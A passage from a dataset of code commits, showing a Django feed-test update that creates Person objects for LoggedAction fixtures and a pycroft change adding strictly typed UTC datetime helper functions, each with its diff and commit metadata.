source='Just for tests...',
)
self.action2 = LoggedAction.objects.create(
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
person=self.person2,
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
def test_unicode(self):
response = self.app.get('/feeds/changes.xml')
self.assertTrue("Just for tests..." in response)
self.assertTrue("Something with unicode in it…" in response)
def tearDown(self):
self.action2.delete()
self.action1.delete()
self.person2.delete()
self.person1.delete()
|
Update feed tests to use a person object when creating LoggedAction
|
Update feed tests to use a person object when creating LoggedAction
Otherwise the notification signal attached to LoggedAction for the
alerts throws an error as it expects a Person to exist
|
Python
|
agpl-3.0
|
DemocracyClub/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,neavouli/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextmp-popit,neavouli/yournextrepresentative,neavouli/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,neavouli/yournextrepresentative
|
---
+++
@@ -4,17 +4,24 @@
from django_webtest import WebTest
+from popolo.models import Person
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
+ self.person1 = Person.objects.create(
+ name='Test Person1'
+ )
+ self.person2 = Person.objects.create(
+ name='Test Person2'
+ )
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
- person_id='9876',
+ person=self.person1,
popit_person_new_version='1234567890abcdef',
source='Just for tests...',
)
@@ -22,7 +29,7 @@
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
- person_id='1234',
+ person=self.person2,
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
@@ -35,3 +42,5 @@
def tearDown(self):
self.action2.delete()
self.action1.delete()
+ self.person2.delete()
+ self.person1.delete()
|
49997f92f8f62a1fc259c0285d386887a399ba0e
|
pycroft/helpers/utc.py
|
pycroft/helpers/utc.py
|
from typing import NewType
from datetime import datetime, time, timezone, date
TimeTz = NewType('TimeTz', time)
DateTimeTz = NewType('DateTimeTz', datetime)
DateTimeNoTz = NewType('DateTimeNoTz', datetime)
def time_min() -> TimeTz:
return time.min.replace(tzinfo=timezone.utc)
def time_max() -> TimeTz:
return time.max.replace(tzinfo=timezone.utc)
def datetime_min() -> DateTimeTz:
return datetime.min.replace(tzinfo=timezone.utc)
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
|
from typing import NewType, Optional
from datetime import datetime, time, timezone, date
TimeTz = NewType('TimeTz', time)
DateTimeTz = NewType('DateTimeTz', datetime)
DateTimeNoTz = NewType('DateTimeNoTz', datetime)
def time_min() -> TimeTz:
return time.min.replace(tzinfo=timezone.utc)
def time_max() -> TimeTz:
return time.max.replace(tzinfo=timezone.utc)
def datetime_min() -> DateTimeTz:
return datetime.min.replace(tzinfo=timezone.utc)
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
def with_min_time(d: date) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, time_min()))
def with_max_time(d: date) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, time_max()))
def safe_combine(d: date, t: TimeTz) -> DateTimeTz:
return DateTimeTz(datetime.combine(d, t))
def ensure_tzinfo(t: time) -> TimeTz:
if t.tzinfo is not None:
return TimeTz(t)
return TimeTz(t.replace(tzinfo=timezone.utc))
def combine_ensure_tzinfo(d: date, t: time) -> DateTimeTz:
return safe_combine(d, ensure_tzinfo(t))
def combine_or_midnight(d: date, t: Optional[time]) -> DateTimeTz:
if t is not None:
return combine_ensure_tzinfo(d, t)
return with_min_time(d)
|
Introduce many strictly typed datetime helper functions
|
Introduce many strictly typed datetime helper functions
|
Python
|
apache-2.0
|
agdsn/pycroft,agdsn/pycroft,agdsn/pycroft,agdsn/pycroft,agdsn/pycroft
|
---
+++
@@ -1,4 +1,4 @@
-from typing import NewType
+from typing import NewType, Optional
from datetime import datetime, time, timezone, date
@@ -21,3 +21,31 @@
def datetime_max() -> DateTimeTz:
return datetime.max.replace(tzinfo=timezone.utc)
+
+
+def with_min_time(d: date) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, time_min()))
+
+
+def with_max_time(d: date) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, time_max()))
+
+
+def safe_combine(d: date, t: TimeTz) -> DateTimeTz:
+ return DateTimeTz(datetime.combine(d, t))
+
+
+def ensure_tzinfo(t: time) -> TimeTz:
+ if t.tzinfo is not None:
+ return TimeTz(t)
+ return TimeTz(t.replace(tzinfo=timezone.utc))
+
+
+def combine_ensure_tzinfo(d: date, t: time) -> DateTimeTz:
+ return safe_combine(d, ensure_tzinfo(t))
+
+
+def combine_or_midnight(d: date, t: Optional[time]) -> DateTimeTz:
+ if t is not None:
+ return combine_ensure_tzinfo(d, t)
+ return with_min_time(d)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.